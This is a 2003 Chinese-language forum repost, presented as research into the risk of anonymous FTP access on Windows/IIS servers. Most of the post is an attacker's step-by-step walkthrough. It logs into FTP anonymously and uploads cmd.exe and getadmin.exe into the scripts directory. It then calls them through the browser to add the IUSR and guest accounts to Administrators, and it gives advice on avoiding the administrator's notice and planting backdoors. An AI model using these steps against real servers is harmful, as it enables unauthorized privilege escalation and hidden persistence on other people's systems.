查看單個文章
舊 2003-11-10, 03:59 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 允許匿名登入ftp伺服器危險性研究

 對於缺乏網路安全意識的網路管理員,在配置windows伺服器時往往只是讓web伺服器能工作起來,並且打了一些一般的修正檔,就認為這個伺服器是很安全的了。其實也不然,當他沒有注重ftp的匿名登入的危險時,就可能產生嚴重漏洞。(關於此危險請參考我發表的一篇文章《關於[url]www.apache.org被入侵的聯想》︴/url]^下面我們將以一個實際的例子看看匿名登入的危險性。
  在shell下,我們可以開始我們的ftp登入:(假設主機為192.168.0.1)
  ftp 192.168.0.1
  Connected to 192.168.0.1
  220 wyztc Microsoft FTP Service (Version 3.0).
  User (192.168.0.1none)):anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password: 輸入anonymous或者guest@ 或者guest
  下面對此程序作一定的解釋(黑體是用戶輸入部分),首先指定提供匿名登入的ip位址,然後ftp開始連接指定ip位址,在第三行中,220一般表示連接成功,接下來的wyztc表示此時主機的netbios名稱。如果你對WINDOWS NT/2000有一定的瞭解,就知道此時主機必然存在一個用戶名叫做IUSR_MACHINENAME(此時是IUSR_wyztc)的帳戶,它就是普通用戶瀏覽此主機上的通用帳戶。然後再輸入anonymous和密碼anonymous就登入了!
  登入後的第一件事情就是用cd跳轉目錄,這個難度最大,如果能成功進入cig-bin或者scripts目錄,你就會有很大的可能得到整個系統的最高權限了。此時加入我們已經很幸運的改變目錄成功,即scripts目錄,接下來我們就需要上傳一些文件到這個目錄下(假設下面需要的文件均放在d:\hacker\中):
  ftp>mput d:\hacker\cmd.exe
  ftp>mput d:\hacker\getadmin.exe
  ftp>mput d:\hacker\gasys.dll
  顯示成功後,我們即可以切換到瀏覽器中,輸入如下形式的指令:http://192.168.0.1/scripts/getadmin.exe?IUSR_wyztc
  大約十多秒後螢幕顯示:
  CGI Error
  此時有很大可能就是把IUSR_wyztc帳戶增加入Administrators組中,就是說任何訪問192.168.0.1的用戶都是Administrator,既然通過瀏覽器訪問已經是Administrator 權限了,所以我們就可以利用net user增加新的帳戶。為了不讓管理員發現,最好將guest帳戶啟動!
  http://192.168.0.1/scripts/cmd」.ex...stem32\net.exe user guest /active:yes
  http://192.168.0.1/scripts/getadmin.exe?guest
  這樣就成功在主機上增加了一個具有Administrators組權限的guest用戶,而且管理員稍不留心也不容易發現,危險性很大。而且一旦有了Administrator權限,就可以放置一些後門,讓主機不再安全了。

  

  

  原作者:ェ☆ve冷★楓
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次